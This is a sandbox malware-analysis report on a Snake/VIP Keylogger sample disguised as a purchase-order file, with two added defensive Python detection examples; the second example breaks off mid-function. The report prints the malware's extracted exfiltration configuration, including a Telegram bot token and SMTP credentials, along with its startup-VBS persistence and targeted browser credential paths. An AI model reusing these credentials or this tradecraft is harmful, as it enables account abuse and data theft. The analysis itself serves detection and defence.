
Windows Analysis Report
New Order RFQ- 19A20060.exe

Overview

General Information

Sample name: New Order RFQ- 19A20060.exe
Analysis ID: 1634995
MD5: bb0e884a1d61d8982403d985146a53b0
SHA1: 99220984fa9952f20ce470aa5dfd79cb2f1e0ec5
SHA256: cc85605d1ee41144689b669be5d86ceca250714dfbbd043aaa3c368fcbad76b5
Tags: exe, user-lowmal3

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • New Order RFQ- 19A20060.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe" MD5: BB0E884A1D61D8982403D985146A53B0)
    • alarmingness.exe (PID: 7844 cmdline: "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe" MD5: BB0E884A1D61D8982403D985146A53B0)
      • RegSvcs.exe (PID: 8012 cmdline: "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5696 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • alarmingness.exe (PID: 1204 cmdline: "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe" MD5: BB0E884A1D61D8982403D985146A53B0)
      • RegSvcs.exe (PID: 5840 cmdline: "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual data exfiltration methods, including email, FTP, SMTP, Pastebin and the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware configuration (VIP Keylogger extractor): {"Exfil Mode": "SMTP", "Bot Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat id": "5013849544", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
Malware configuration (Snake Keylogger extractor): {"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat_id": "5013849544", "Version": "4.4"}
Source | Rule | Description | Author
00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d8be:$a1: get_encryptedPassword
  • 0x2dbdf:$a2: get_encryptedUsername
  • 0x2d6dc:$a3: get_timePasswordChanged
  • 0x2d7d7:$a4: get_passwordField
  • 0x2d8d4:$a5: set_encryptedPassword
  • 0x2efad:$a7: get_logins
  • 0x2eef9:$a10: KeyLoggerEventArgs
  • 0x2eb5e:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x3b691:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x3ad34:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x3af91:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3b970:$a5: \Kometa\User Data\Default\Login Data
(28 further entries not shown)
Source | Rule | Description | Author
10.2.alarmingness.exe.f00000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
10.2.alarmingness.exe.f00000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
10.2.alarmingness.exe.f00000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
10.2.alarmingness.exe.f00000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2babe:$a1: get_encryptedPassword
  • 0x2bddf:$a2: get_encryptedUsername
  • 0x2b8dc:$a3: get_timePasswordChanged
  • 0x2b9d7:$a4: get_passwordField
  • 0x2bad4:$a5: set_encryptedPassword
  • 0x2d1ad:$a7: get_logins
  • 0x2d0f9:$a10: KeyLoggerEventArgs
  • 0x2cd5e:$a11: KeyLoggerEventArgsEventHandler
10.2.alarmingness.exe.f00000.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x39891:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38f34:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x39191:$a4: \Orbitum\User Data\Default\Login Data
  • 0x39b70:$a5: \Kometa\User Data\Default\Login Data
(24 further entries not shown)

              System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs", CommandLine|base64offset|contains: (empty), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs", ProcessId: 5696, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs", CommandLine|base64offset|contains: (empty), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs", ProcessId: 5696, ProcessName: wscript.exe
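The two Sigma matches above fire on the same event: wscript.exe executing alarmingness.vbs out of the user's Startup folder. The process tree adds two further facts worth detecting on: the script host then starts alarmingness.exe from %LOCALAPPDATA%\tapestrylike, and each RegSvcs.exe instance runs with the command line of its parent rather than its own image (the footprint of the injection the "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures describe). The following Python is an added example, not code from the Joe Sandbox report or from the Sigma rules it cites: it runs three detection rules over process-creation records that are constructed from this report's process tree (PIDs, images and command lines as listed; the parent of wscript.exe is only the PID 3964 on the page, so its image is left unknown). Rule names, the benign control record and the field layout are the example's own assumptions.

```python
"""Process-creation detections for the chain in this report: wscript.exe launching a
.vbs from the Startup folder, that script host spawning a binary from AppData, and
processes whose command line names a different executable than their image.
Added example; the records below are constructed from the report's process tree."""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
STARTUP_MARK = "\\start menu\\programs\\startup\\"

# Constructed records with the fields a Sysmon Event ID 1 / Security 4688 entry would carry.
# pid/ppid/image/cmdline are transcribed from the report; ppid None = not on the page.
EVENTS = [
    {"pid": 7828, "ppid": None, "image": r"C:\Users\user\Desktop\New Order RFQ- 19A20060.exe",
     "cmdline": r'"C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"'},
    {"pid": 7844, "ppid": 7828, "image": r"C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe",
     "cmdline": r'"C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"'},
    {"pid": 8012, "ppid": 7844, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"'},
    {"pid": 5696, "ppid": 3964, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs"'},
    {"pid": 1204, "ppid": 5696, "image": r"C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe"'},
    {"pid": 5840, "ppid": 1204, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe"'},
    # Constructed benign control: an admin running a system script from System32 must not fire.
    {"pid": 9001, "ppid": 3964, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv"},
]


def tokens(cmdline):
    """Split a Windows command line into argv-style tokens, keeping quoted paths whole."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def argv0(cmdline):
    """The program path the command line claims to run (empty string if none)."""
    t = tokens(cmdline)
    return t[0] if t else ""


def rule_script_host_runs_startup_script(ev, by_pid):
    """Sigma-style: wscript/cscript executing a script that lives under a Startup folder."""
    if ntpath.basename(ev["image"]).lower() not in SCRIPT_HOSTS:
        return None
    for tok in tokens(ev["cmdline"])[1:]:
        t = tok.lower()
        if t.endswith(SCRIPT_EXTS) and STARTUP_MARK in t:
            return "script_host_runs_startup_script"
    return None


def rule_cmdline_image_mismatch(ev, by_pid):
    """Image on disk differs from the executable named in the command line. This is what
    a hollowed RegSvcs.exe looks like in telemetry; it also flags the copied dropper,
    which the report shows running under the original sample's command line."""
    claimed = ntpath.basename(argv0(ev["cmdline"])).lower()
    actual = ntpath.basename(ev["image"]).lower()
    return "cmdline_image_mismatch" if claimed and claimed != actual else None


def rule_script_host_spawns_appdata_binary(ev, by_pid):
    """A script-host parent starting an executable from a user-writable AppData path."""
    parent = by_pid.get(ev["ppid"])
    if (parent and ntpath.basename(parent["image"]).lower() in SCRIPT_HOSTS
            and "\\appdata\\" in ev["image"].lower()):
        return "script_host_spawns_appdata_binary"
    return None


RULES = (rule_script_host_runs_startup_script, rule_cmdline_image_mismatch,
         rule_script_host_spawns_appdata_binary)


def detect(events):
    """Run every rule over every record; returns [(pid, rule_name), ...] in event order."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        for rule in RULES:
            name = rule(ev, by_pid)
            if name:
                hits.append((ev["pid"], name))
    return hits


if __name__ == "__main__":
    for pid, name in detect(EVENTS):
        print(pid, name)
```

The mismatch rule needs an allow-list in production (launchers that legitimately rewrite their command line), but on this tree it isolates exactly the two RegSvcs.exe instances plus the renamed copy of the dropper, and the startup-script rule stays quiet on the System32 control record.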

              Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe, ProcessId: 7844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T09:04:47.676123+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49716 | 104.21.112.1 | 443 | TCP
2025-03-11T09:04:50.530581+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49720 | 104.21.112.1 | 443 | TCP
2025-03-11T09:04:57.785754+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.112.1 | 443 | TCP
2025-03-11T09:05:20.568450+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 104.21.112.1 | 443 | TCP
2025-03-11T09:05:30.450932+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 104.21.112.1 | 443 | TCP
2025-03-11T09:04:42.754853+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49713 | 193.122.6.168 | 80 | TCP
2025-03-11T09:04:45.176703+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49713 | 193.122.6.168 | 80 | TCP
2025-03-11T09:04:48.364232+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49718 | 193.122.6.168 | 80 | TCP
2025-03-11T09:04:53.473678+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49726 | 193.122.6.168 | 80 | TCP
2025-03-11T09:04:55.754873+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49726 | 193.122.6.168 | 80 | TCP
2025-03-11T09:04:58.489348+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 193.122.6.168 | 80 | TCP
2025-03-11T09:05:25.284001+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49751 | 149.154.167.220 | 443 | TCP
2025-03-11T09:05:34.530217+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49756 | 149.154.167.220 | 443 | TCP

              AV Detection

Source: New Order RFQ- 19A20060.exe | Avira: detected
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Avira: detection malicious, Label: TR/AD.SnakeStealer.jnxyz
Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat id": "5013849544", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat_id": "5013849544", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Virustotal: Detection: 38%
Source: New Order RFQ- 19A20060.exe | Virustotal: Detection: 38%
Source: New Order RFQ- 19A20060.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 11.2.RegSvcs.exe.400000.0.unpack | String decryptor: sales-nguyen@vvtrade.vn
Source: 11.2.RegSvcs.exe.400000.0.unpack | String decryptor: qVyP6qyv6MQCmZJBRs4t
Source: 11.2.RegSvcs.exe.400000.0.unpack | String decryptor: mail.vvtrade.vn
Source: 11.2.RegSvcs.exe.400000.0.unpack | String decryptor: saleseuropower@yandex.com
Source: 11.2.RegSvcs.exe.400000.0.unpack | String decryptor: 587
Source: 11.2.RegSvcs.exe.400000.0.unpack | String decryptor: 7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0
Source: 11.2.RegSvcs.exe.400000.0.unpack | String decryptor: 5013849544
Source: 11.2.RegSvcs.exe.400000.0.unpack | String decryptor: (empty string)

              Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: New Order RFQ- 19A20060.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49714, version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49728, version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751, version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756, version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: alarmingness.exe, 00000001.00000003.1206468125.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 00000001.00000003.1207010128.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1316072696.0000000003900000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1315012290.0000000003760000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: alarmingness.exe, 00000001.00000003.1206468125.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 00000001.00000003.1207010128.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1316072696.0000000003900000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1315012290.0000000003760000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007A445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AC6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FE445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEC6D1 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FE37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FE3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 028DF8E9h | in 3_2_028DF631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 028DFD41h | in 3_2_028DFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064931E0h | in 3_2_06492DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06490D0Dh | in 3_2_06490B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06491697h | in 3_2_06490B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06492C19h | in 3_2_06492968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649E0A9h | in 3_2_0649DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649E959h | in 3_2_0649E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649F209h | in 3_2_0649EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649CF49h | in 3_2_0649CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649D7F9h | in 3_2_0649D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064931E0h | in 3_2_06492DBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649E501h | in 3_2_0649E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649EDB1h | in 3_2_0649EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649F661h | in 3_2_0649F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | in 3_2_06490040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649FAB9h | in 3_2_0649F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649D3A1h | in 3_2_0649D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064931E0h | in 3_2_0649310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0649DC51h | in 3_2_0649D9A8
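The "4x nop then jmp" entries above are a static heuristic over the JIT-compiled .NET code that RegSvcs.exe ends up running: runs of 0x90 padding immediately followed by a relative jump, which is the inlined-NOP / call-push-ret style of indirection the "Found inlined nop instructions" and "Uses code obfuscation techniques" signatures refer to. The following Python is an added example, not taken from the report, from Joe Security or from the sample: it implements that scan and resolves each jump's target address over a constructed x86 byte buffer. The buffer is laid out so that its first hit reproduces the report's first entry (a jump inside the function at 028DF631 landing on 028DF8E9h); it also contains a two-NOP run below the threshold and a four-NOP run followed by a mov, neither of which the scan reports. The base address, the threshold of four NOPs and the surrounding filler instructions are the example's own assumptions.

```python
"""Find runs of >= min_nops NOP bytes followed by a jmp rel8/rel32 and resolve the
jump target, the pattern behind the report's '4x nop then jmp' hits. Added example
over a constructed buffer; nothing here is extracted from the sample."""
import struct

BASE = 0x028DF631  # assumed load address: the first flagged RegSvcs.exe function in the report


def find_nop_jmp(code, base, min_nops=4):
    """Return (offset_of_first_nop, nop_count, jmp_target_va) for every NOP run that
    is at least min_nops long and is immediately followed by jmp rel32 (E9) or rel8 (EB)."""
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != 0x90:
            i += 1
            continue
        start = i
        while i < n and code[i] == 0x90:
            i += 1
        count = i - start
        if count < min_nops or i >= n:
            continue                      # i already sits past the run
        op = code[i]
        if op == 0xE9 and i + 5 <= n:     # jmp rel32: target = next_ip + rel32
            rel = struct.unpack_from("<i", code, i + 1)[0]
            hits.append((start, count, base + i + 5 + rel))
        elif op == 0xEB and i + 2 <= n:   # jmp rel8: target = next_ip + rel8
            rel = struct.unpack_from("<b", code, i + 1)[0]
            hits.append((start, count, base + i + 2 + rel))
    return hits


def build_sample():
    """Constructed buffer: a short prologue, a 4-NOP run plus jmp rel32 aimed at
    0x028DF8E9 (the report's first hit), a 2-NOP run plus short jmp (under threshold),
    a 5-NOP run plus short jmp, and a 4-NOP run before a mov (no jmp, not reported)."""
    buf = bytearray(b"\x55\x8b\xec\x83\xec\x10")          # push ebp; mov ebp,esp; sub esp,10h
    buf += b"\x90" * 4                                    # offset 6..9
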